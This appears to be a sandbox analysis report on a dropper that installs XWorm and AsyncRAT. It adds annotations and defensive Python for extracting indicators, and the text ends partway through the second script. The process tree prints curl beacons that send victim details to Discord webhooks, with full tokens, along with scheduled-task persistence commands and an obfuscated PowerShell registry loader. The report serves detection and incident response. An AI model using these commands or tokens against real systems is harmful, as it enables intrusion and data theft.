Analysis

max time kernel: 149s
max time network: 149s
platform: windows7_x64
resource: win7-20240508-en
resource tags: arch:x64, arch:x86, image:win7-20240508-en, locale:en-us, os:windows7-x64, system
submitted: 22-06-2024 05:33

Static task: static1
Behavioral task: behavioral1
Sample: Dropper.exe
Resource: win7-20240508-en

General

Target: Dropper.exe
Size: 1.4MB
MD5: 19b0c113a289ffdac673f5746be14b9d
SHA1: 5a6f5fa38916a6058c88d5f45fc37f89872c0cb9
SHA256: 24e5bb5ab34a162b750abc2d8a38a48afceee92fc256f2a2fc3ff49f327fbf4a
SHA512: 253d62161d97ad83ba272a1e749a8cbfda51bf7b2e2825d98e41039208fc22b1f91315a0e8c6ee84d3c6b4e6f2867bf64e7bb53bb77384ab6a3340338896806e
SSDEEP: 12288:w8w1hc0Q53LOAGkjwtBx5n4AYakafNh/2mPj/YDLm7GylDULvEd8oK/mngAmgIv:wjmwDtPjwuB
Malware Config

Extracted: xworm
C2: politics-fiber.gl.at.ply.gg:47430
Install_directory: %AppData%
install_file: $77-scchost.exe

Extracted: asyncrat
Botnet: Default
C2: environmental-blank.gl.at.ply.gg:25944
delay: 1
install: true
install_file: $77-aachost.exe
install_folder: %AppData%

Both C2 hosts are *.gl.at.ply.gg names, i.e. playit.gg tunnel endpoints: the operator's real address sits behind the tunnel, so hunt and block on the hostname:port pairs rather than on whatever IP they resolved to at analysis time.
Signatures

Detect Xworm Payload (2 IoCs)
- yara rule family_xworm: \Users\Admin\AppData\Local\Temp\$77-sdchost.exe
- yara rule family_xworm: behavioral1/memory/2652-11-0x0000000000B70000-0x0000000000B82000-memory.dmp
Modifies security service (2 TTPs, 2 IoCs)
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\MpsSvc\Parameters\PortKeywords\DHCP (svchost.exe)
- Set value (data): \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\MpsSvc\Parameters\PortKeywords\DHCP\Collection (svchost.exe)
Both writes come from the svchost.exe -k LocalServiceNetworkRestricted host, which is where the Windows Firewall service (MpsSvc) itself runs, and PortKeywords is that service's own bookkeeping. Treat this hit as sandbox noise unless you can tie that service host to the injected code recorded under WriteProcessMemory below.
Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
- PID 2292 created 432 | process: 2292 powershell.EXE | target process: winlogon.exe
The powershell.EXE loader, started as SYSTEM by the task scheduler, created a child with winlogon.exe (PID 432) named as its parent. That is why dllhost.exe (PID 2128) sits under winlogon.exe in the process tree even though powershell.EXE 2292 is the process that wrote its memory and set its thread context.
Async RAT payload (1 IoC)
- yara rule family_asyncrat: \Users\Admin\AppData\Local\Temp\$77-aachost.exe
Executes dropped EXE (9 IoCs)
- 2652 $77-sdchost.exe
- 2664 $77-aachost.exe
- 2084 $77-penisballs.exe
- 2780 $77-install.exe
- 804 $77-sdchost.exe
- 1740 $77-aachost.exe
- 856 $77-penisballs.exe
- 2628 $77-aachost.exe
- 2776 $77-aachost.exe
Loads dropped DLL (4 IoCs)
- 1636 Dropper.exe (4 entries)
Drops file in System32 directory (5 IoCs)
- File opened for modification: C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (powershell.EXE)
- File opened for modification: C:\Windows\system32\config\systemprofile\AppData\Roaming\MyData\DataLogs.conf ($77-penisballs.exe)
- File opened for modification: C:\Windows\System32\Tasks\$77-aachost (svchost.exe)
- File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe ($77-aachost.exe)
- File created: C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe ($77-sdchost.exe)
The config\systemprofile\AppData\Roaming paths are %AppData% as resolved for the SYSTEM account: the payload copies relaunched under SYSTEM (the children of dllhost.exe 2128 in the process tree) install themselves there, so each RAT ends up with one copy under C:\Users\Admin\AppData\Roaming and a second under the system profile. Hunt both locations.
Suspicious use of SetThreadContext (1 IoC)
- PID 2292 powershell.EXE set thread context of 2128 dllhost.exe
Drops file in Windows directory (1 IoC)
- File opened for modification: C:\Windows\appcompat\programs\RecentFileCache.bcf (svchost.exe)
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Delays execution with timeout.exe (2 IoCs)
- 1132 timeout.exe
- 1596 timeout.exe
Modifies data under HKEY_USERS (27 IoCs)
- Set value (data): \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{23170F69-40C1-278A-1000-000100020000} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000005db2cb65c4da01 (dllhost.exe)
- Set value (data): \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 ($77-penisballs.exe)
- Set value (data): \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 ($77-aachost.exe)
- Set value (data): \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = c0b1f8ca65c4da01 (powershell.EXE)
- Set value (data): \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{F81E9010-6EA4-11CE-A7FF-00AA003CA9F6} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000409aadcb65c4da01 (dllhost.exe)
- Set value (data): \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{85BBD920-42A0-1069-A2E4-08002B30309D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000a0fbafcb65c4da01 (dllhost.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ($77-sdchost.exe)
- Set value (data): \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{596AB062-B4D2-4215-9F74-E9109B0A8153} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000060b3a1cb65c4da01 (dllhost.exe)
- Set value (data): \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{474C98EE-CF3D-41F5-80E3-4AAB0AB04301} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 010000000000000060b3a1cb65c4da01 (dllhost.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" ($77-aachost.exe)
- Set value (data): \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 ($77-aachost.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" ($77-sdchost.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (dllhost.exe)
- Set value (data): \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1A0391BF-9564-4294-B0A4-06C298929EF9} {A08CE4D0-FA25-44AB-B57C-C7B1C323E0B9} 0xFFFF = 0100000000000000a0fbafcb65c4da01 (dllhost.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" ($77-aachost.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" ($77-sdchost.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" (dllhost.exe)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ($77-aachost.exe)
- Set value (data): \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000e038abcb65c4da01 (dllhost.exe)
- Set value (data): \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 (dllhost.exe)
- Set value (data): \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{0A88C858-7D0C-4549-9499-7DB05F0CB0BF} {A08CE4D0-FA25-44AB-B57C-C7B1C323E0B9} 0xFFFF = 0100000000000000a0fbafcb65c4da01 (dllhost.exe)
- Set value (data): \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{1D27F844-3A1F-4410-85AC-14651078412D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000005db2cb65c4da01 (dllhost.exe)
- Set value (int): \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" (dllhost.exe)
- Key created: \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage (powershell.EXE)
- Key created: \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached (dllhost.exe)
- Set value (data): \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{7B4A83B6-F704-4B77-8E3D-C6087E3A21D2} {BDDACB60-7657-47AE-8445-D23E1ACF82AE} 0xFFFF = 0100000000000000a0fbafcb65c4da01 (dllhost.exe)
- Set value (str): \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\ntshrui.dll,-103 = "S&hare with" (dllhost.exe)
All 27 writes land in HKEY_USERS\.DEFAULT, the hive a SYSTEM-context process sees as its "current user". They come from powershell.EXE 2292 and from the copies relaunched as SYSTEM (dllhost.exe 2128 and its children). The values themselves (MuiCache, Shell Extensions cache, Internet Settings ZoneMap) are side effects of .NET, WinINet and shell initialisation; they are evidence that these processes ran as SYSTEM, not configuration the malware set deliberately.
Scheduled Task/Job: Scheduled Task (1 TTP, 3 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
- 2316 schtasks.exe
- 2424 schtasks.exe
- 2680 schtasks.exe
Suspicious behavior: EnumeratesProcesses (24 IoCs)
- 2292 powershell.EXE (2 entries)
- 2128 dllhost.exe (6 entries)
- 2664 $77-aachost.exe (3 entries)
- 2084 $77-penisballs.exe (2 entries)
- 1740 $77-aachost.exe (3 entries)
- 856 $77-penisballs.exe (8 entries)
Suspicious use of AdjustPrivilegeToken (12 IoCs)
Every entry is Token: SeDebugPrivilege.
- 2652 $77-sdchost.exe
- 2084 $77-penisballs.exe
- 2292 powershell.EXE (2 entries)
- 2128 dllhost.exe
- 804 $77-sdchost.exe (2 entries)
- 2664 $77-aachost.exe
- 856 $77-penisballs.exe
- 1740 $77-aachost.exe
- 2628 $77-aachost.exe
- 2776 $77-aachost.exe
Suspicious use of SetWindowsHookEx (2 IoCs)
- 2084 $77-penisballs.exe
- 856 $77-penisballs.exe
SetWindowsHookEx is the API behind keyboard and mouse hooks. Only this component installs one, and it is also the process that writes MyData\DataLogs.conf (see Drops file in System32 directory), so it is the one to check for keystroke capture.
Suspicious use of WriteProcessMemory (64 IoCs)
Listed as writer -> target (number of entries):
- 1636 Dropper.exe -> 2284 cmd.exe (4)
- 1636 Dropper.exe -> 2652 $77-sdchost.exe (4)
- 1636 Dropper.exe -> 2664 $77-aachost.exe (4)
- 1636 Dropper.exe -> 2084 $77-penisballs.exe (4)
- 1636 Dropper.exe -> 2780 $77-install.exe (7)
- 2808 taskeng.exe -> 2292 powershell.EXE (3)
- 2292 powershell.EXE -> 2128 dllhost.exe (9)
- 2128 dllhost.exe -> 432 winlogon.exe (1)
- 2128 dllhost.exe -> 480 services.exe (1)
- 2128 dllhost.exe -> 488 lsass.exe (1)
- 2128 dllhost.exe -> 496 lsm.exe (1)
- 2128 dllhost.exe -> 804 $77-sdchost.exe (3)
- 2128 dllhost.exe -> 1740 $77-aachost.exe (3)
- 2128 dllhost.exe -> 592 svchost.exe (1)
- 2128 dllhost.exe -> 856 $77-penisballs.exe (3)
- 2128 dllhost.exe -> 668 svchost.exe (1)
- 2128 dllhost.exe -> 748 svchost.exe (1)
- 2128 dllhost.exe -> 808 svchost.exe (1)
- 2664 $77-aachost.exe -> 580 cmd.exe (3)
- 2664 $77-aachost.exe -> 1808 cmd.exe (3)
- 1808 cmd.exe -> 1132 timeout.exe (3)
- 580 cmd.exe -> 2316 schtasks.exe (3)
Two chains matter here. powershell.EXE 2292 wrote into dllhost.exe 2128 nine times and redirected one of its threads (SetThreadContext above), the usual shape of process hollowing. dllhost.exe 2128 then wrote into winlogon.exe, services.exe, lsass.exe, lsm.exe and four svchost.exe instances; the 172KB, 148KB and 64KB regions later dumped from PIDs 432, 480, 488 and 496 (see Downloads) are the result, i.e. this stage injects into system processes. Writes from a parent into a freshly created child (Dropper.exe, cmd.exe) are ordinary process start-up and can be ignored.
Uses Task Scheduler COM API (1 TTP)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
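Two kinds of command line in the process tree below carry what a responder needs for persistence and exfiltration hunting: the schtasks /create invocations (a one-minute repeating task that the xworm copy creates as SYSTEM, and an onlogon task with highest run level that the asyncrat copy creates once as Admin and once as SYSTEM) and the curl POSTs that report the infected host to a Discord webhook. The Python below is an added example, not part of the report or of either RAT's code; it parses those command lines offline into structured indicators (task name, trigger, run level, executable path; webhook id and token; the host fields the beacon leaks) so they can be matched against scheduled-task and proxy logs. The sample command lines are copied verbatim from the tree (the beacon is the one sent by the asyncrat copy running as Admin); the option parser is a small regex for the schtasks syntax seen here, not a general Windows argument parser.

```python
import json
import re

# Constructed inputs, copied verbatim from the process tree in this report.
SCHTASKS_SAMPLES = [
    r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 '
    r'/tn "$77-scchost" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe"',
    r"""schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'""",
]
FENCE = "`" * 3  # the beacon wraps host details in a Markdown code block
WEBHOOK_SAMPLE = (
    r'"C:\Windows\System32\cmd.exe" /c curl -X POST -H "Content-Type: application/json" '
    r'-d "{\"content\": \"@everyone \nWe Got Em! \n' + FENCE +
    r'Username: Admin\nOS: Microsoft Windows NT 6.1.7601 Service Pack 1\nProcessors: 8\n'
    r'Machine Name: PUMARTNR\nSystem Architecture: 64-bit\nHWID: 1459E3DC92264459B5C1\n'
    r'User HWID: S-1-5-21-2737914667-933161113-3798636211-1000\nAnti-Virus: Unknown\n' + FENCE +
    r'\"}" https://discord.com/api/webhooks/1253702401148588093/'
    r'dy9JeySIO-GmMDLOGujcr56gIgSixllB84150v7DKIbzkhbLiHitZal0nF3_B2IriNPY'
)

# /opt followed by an optional value: "quoted", 'quoted' or a bare token.
# (?!/) stops a following switch from being swallowed as the value of /f.
OPT_RE = re.compile(r"""/(\w+)(?:\s+(?!/)("[^"]*"|'[^']*'|\S+))?""")
WEBHOOK_RE = re.compile(r"https://discord(?:app)?\.com/api/webhooks/(\d+)/([A-Za-z0-9_-]+)")


def parse_schtasks(cmdline: str):
    """Turn a schtasks /create command line into a persistence record, or None."""
    if "schtasks" not in cmdline.lower():
        return None
    opts = {}
    for name, val in OPT_RE.findall(cmdline):
        # AsyncRAT quotes the action as '"path"'; strip both quote styles.
        opts[name.lower()] = val.strip("'\"") if val else True
    if "create" not in opts:
        return None
    return {
        "task_name": opts.get("tn"),
        "action": opts.get("tr"),
        "schedule": opts.get("sc", "").lower(),   # minute / onlogon / ...
        "modifier": opts.get("mo"),               # e.g. "1" with /sc minute
        "run_level": opts.get("rl", "").lower(),  # "highest" = elevated token
        "force": opts.get("f", False) is True,
    }


def parse_webhook_beacon(cmdline: str):
    """Extract the webhook id/token and the leaked host fields from a curl beacon."""
    m = WEBHOOK_RE.search(cmdline)
    if not m:
        return None
    # curl -d "<json>": the JSON is shell-quoted with \" escapes; undo them and decode.
    d = re.search(r'-d\s+"(.*?)"\s+https://', cmdline, re.S)
    payload = json.loads(d.group(1).replace('\\"', '"')) if d else {}
    content = payload.get("content", "")
    # Host details sit between the two code fences as "Key: value" lines.
    fields = {}
    block = content.split(FENCE)
    if len(block) >= 2:
        for line in block[1].splitlines():
            if ": " in line:
                k, v = line.split(": ", 1)
                fields[k.strip()] = v.strip()
    return {"webhook_id": m.group(1), "webhook_token": m.group(2), "fields": fields}


def extract_iocs(cmdlines):
    """Run both parsers over a list of command lines and collect what they find."""
    found = {"scheduled_tasks": [], "webhooks": []}
    for c in cmdlines:
        t = parse_schtasks(c)
        if t:
            found["scheduled_tasks"].append(t)
        w = parse_webhook_beacon(c)
        if w:
            found["webhooks"].append(w)
    return found


if __name__ == "__main__":
    print(json.dumps(extract_iocs(SCHTASKS_SAMPLES + [WEBHOOK_SAMPLE]), indent=2))
```

The webhook id and token are what you report to Discord for takedown; the task records give the names to look for with schtasks /query and the paths to check on disk, remembering that the SYSTEM-context copies resolve %AppData% to the systemprofile directory.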
Processes

Each entry gives the image path, then its command line, then the signatures that fired for it; indentation is the depth in the tree.

1  C:\Windows\system32\winlogon.exe
   cmdline: winlogon.exe
   2  C:\Windows\System32\dllhost.exe
      cmdline: C:\Windows\System32\dllhost.exe /Processid:{56ad2e2b-f271-43a7-b521-81f6ee80bebe}
      - Modifies data under HKEY_USERS
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      3  C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
         cmdline: "C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
         - Executes dropped EXE
         - Drops file in System32 directory
         - Modifies data under HKEY_USERS
         - Suspicious use of AdjustPrivilegeToken
         4  C:\Windows\System32\schtasks.exe
            cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe"
            - Scheduled Task/Job: Scheduled Task
      3  C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
         cmdline: "C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
         - Executes dropped EXE
         - Drops file in System32 directory
         - Modifies data under HKEY_USERS
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         4  C:\Windows\System32\cmd.exe
            cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"' & exit
            5  C:\Windows\system32\schtasks.exe
               cmdline: schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"'
               - Scheduled Task/Job: Scheduled Task
         4  C:\Windows\system32\cmd.exe
            cmdline: cmd /c ""C:\Windows\TEMP\tmp34F5.tmp.bat""
            5  C:\Windows\system32\timeout.exe
               cmdline: timeout 3
               - Delays execution with timeout.exe
            5  C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe
               cmdline: "C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"
               - Executes dropped EXE
               - Modifies data under HKEY_USERS
               - Suspicious use of AdjustPrivilegeToken
               6  C:\Windows\System32\cmd.exe
                  cmdline: "C:\Windows\System32\cmd.exe" /c curl -X POST -H "Content-Type: application/json" -d "{\"content\": \"@everyone \nWe Got Em! \n```Username: SYSTEM\nOS: Microsoft Windows NT 6.1.7601 Service Pack 1\nProcessors: 8\nMachine Name: PUMARTNR\nSystem Architecture: 64-bit\nHWID: 2E0ADD3FE2A706954F8C\nUser HWID: S-1-5-18\nAnti-Virus: Unknown\n```\"}" https://discord.com/api/webhooks/1253702401148588093/dy9JeySIO-GmMDLOGujcr56gIgSixllB84150v7DKIbzkhbLiHitZal0nF3_B2IriNPY
      3  C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
         cmdline: "C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
         - Executes dropped EXE
         - Drops file in System32 directory
         - Modifies data under HKEY_USERS
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious use of SetWindowsHookEx

1  C:\Windows\system32\services.exe
   cmdline: C:\Windows\system32\services.exe
   2  C:\Windows\system32\svchost.exe
      cmdline: C:\Windows\system32\svchost.exe -k DcomLaunch
      3  C:\Windows\system32\DllHost.exe
         cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
   2  C:\Windows\system32\svchost.exe
      cmdline: C:\Windows\system32\svchost.exe -k RPCSS
   2  C:\Windows\System32\svchost.exe
      cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
      - Modifies security service
   2  C:\Windows\System32\svchost.exe
      cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
      3  C:\Windows\system32\Dwm.exe
         cmdline: "C:\Windows\system32\Dwm.exe"
   2  C:\Windows\system32\svchost.exe
      cmdline: C:\Windows\system32\svchost.exe -k netsvcs
      - Drops file in System32 directory
      - Drops file in Windows directory
      3  C:\Windows\system32\taskeng.exe
         cmdline: taskeng.exe {98EB832A-1BF5-4208-900E-90BB98948D0E} S-1-5-18:NT AUTHORITY\System:Service:
         - Suspicious use of WriteProcessMemory
         4  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
            cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+[Char](84)+'W'+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+''+'7'+'7'+[Char](115)+''+[Char](116)+'a'+'g'+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
            - Suspicious use of NtCreateUserProcessOtherParentProcess
            - Drops file in System32 directory
            - Suspicious use of SetThreadContext
            - Modifies data under HKEY_USERS
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
   2  C:\Windows\system32\svchost.exe
      cmdline: C:\Windows\system32\svchost.exe -k LocalService
   2  C:\Windows\system32\svchost.exe
      cmdline: C:\Windows\system32\svchost.exe -k NetworkService
   2  C:\Windows\System32\spoolsv.exe
      cmdline: C:\Windows\System32\spoolsv.exe
   2  C:\Windows\system32\svchost.exe
      cmdline: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
   2  C:\Windows\system32\taskhost.exe
      cmdline: "taskhost.exe"
   2  C:\Windows\system32\svchost.exe
      cmdline: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
   2  C:\Windows\system32\sppsvc.exe
      cmdline: C:\Windows\system32\sppsvc.exe

1  C:\Windows\system32\lsass.exe
   cmdline: C:\Windows\system32\lsass.exe

1  C:\Windows\system32\lsm.exe
   cmdline: C:\Windows\system32\lsm.exe

1  C:\Windows\Explorer.EXE
   cmdline: C:\Windows\Explorer.EXE
   2  C:\Users\Admin\AppData\Local\Temp\Dropper.exe
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Dropper.exe"
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
      3  C:\Windows\SysWOW64\cmd.exe
         cmdline: "C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
      3  C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
         cmdline: "C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
         - Executes dropped EXE
         - Suspicious use of AdjustPrivilegeToken
      3  C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
         cmdline: "C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
         - Executes dropped EXE
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious use of WriteProcessMemory
         4  C:\Windows\System32\cmd.exe
            cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"' & exit
            - Suspicious use of WriteProcessMemory
            5  C:\Windows\system32\schtasks.exe
               cmdline: schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Users\Admin\AppData\Roaming\$77-aachost.exe"'
               - Scheduled Task/Job: Scheduled Task
         4  C:\Windows\system32\cmd.exe
            cmdline: cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp2F1C.tmp.bat""
            - Suspicious use of WriteProcessMemory
            5  C:\Windows\system32\timeout.exe
               cmdline: timeout 3
               - Delays execution with timeout.exe
            5  C:\Users\Admin\AppData\Roaming\$77-aachost.exe
               cmdline: "C:\Users\Admin\AppData\Roaming\$77-aachost.exe"
               - Executes dropped EXE
               - Suspicious use of AdjustPrivilegeToken
               6  C:\Windows\System32\cmd.exe
                  cmdline: "C:\Windows\System32\cmd.exe" /c curl -X POST -H "Content-Type: application/json" -d "{\"content\": \"@everyone \nWe Got Em! \n```Username: Admin\nOS: Microsoft Windows NT 6.1.7601 Service Pack 1\nProcessors: 8\nMachine Name: PUMARTNR\nSystem Architecture: 64-bit\nHWID: 1459E3DC92264459B5C1\nUser HWID: S-1-5-21-2737914667-933161113-3798636211-1000\nAnti-Virus: Unknown\n```\"}" https://discord.com/api/webhooks/1253702401148588093/dy9JeySIO-GmMDLOGujcr56gIgSixllB84150v7DKIbzkhbLiHitZal0nF3_B2IriNPY
      3  C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
         cmdline: "C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
         - Executes dropped EXE
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious use of SetWindowsHookEx
      3  C:\Users\Admin\AppData\Local\Temp\$77-install.exe
         cmdline: "C:\Users\Admin\AppData\Local\Temp\$77-install.exe"
         - Executes dropped EXE

1  C:\Windows\system32\conhost.exe
   cmdline: \??\C:\Windows\system32\conhost.exe "-2082558270168315110-121243796510879053351864046498-9622193961586781458-1196520806"
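The powershell.EXE command line in the tree above loads a .NET assembly straight from a registry value, with the key and value names built from single-character literals and [Char] casts so that neither the key nor the value name appears in the command line as a searchable string. The Python below is an added example, not part of the report or of the malware; it folds those concatenation chains offline and pulls out the hive, subkey and value name so the location can be hunted across an estate with a registry query. Its only input is the command line copied from the tree (the example recovers HKLM\SOFTWARE\$77stager). The $77- prefix on every dropped file and task name, together with a stager held under a $77-prefixed registry value, matches the conventions of the open-source r77 rootkit, which hides files, processes and tasks whose names begin with $77; that attribution is my reading of the indicators, not a statement the report makes.

```python
import re

# Constructed input: the powershell.EXE command line from the process tree in this
# report, copied verbatim (the outer double quotes passed by taskeng are dropped).
LOADER_CMDLINE = (
    "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey("
    "'S'+[Char](79)+''+'F'+''+[Char](84)+'W'+'A'+''+[Char](82)+''+[Char](69)+'')"
    ".GetValue(''+[Char](36)+''+'7'+'7'+[Char](115)+''+[Char](116)+'a'+'g'+''"
    "+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
)

# One term of a PowerShell concatenation chain: a single-quoted literal or [Char](N).
_TERM = r"(?:'[^']*'|\[[Cc]har\]\(\d+\))"
# A whole chain: term ('+' term)*.  Only string-building chains are rewritten.
_CHAIN = re.compile(rf"{_TERM}(?:\s*\+\s*{_TERM})*")
_CHAR = re.compile(r"\[[Cc]har\]\((\d+)\)")

# Hive names as used by Microsoft.Win32.Registry, mapped to their usual short forms.
HIVES = {
    "LocalMachine": "HKLM", "CurrentUser": "HKCU", "Users": "HKU",
    "ClassesRoot": "HKCR", "CurrentConfig": "HKCC",
}


def eval_chain(expr: str) -> str:
    """Fold 'lit' + [Char](N) + ... into the plain string PowerShell would build."""
    parts = []
    for term in re.findall(_TERM, expr):
        m = _CHAR.fullmatch(term)
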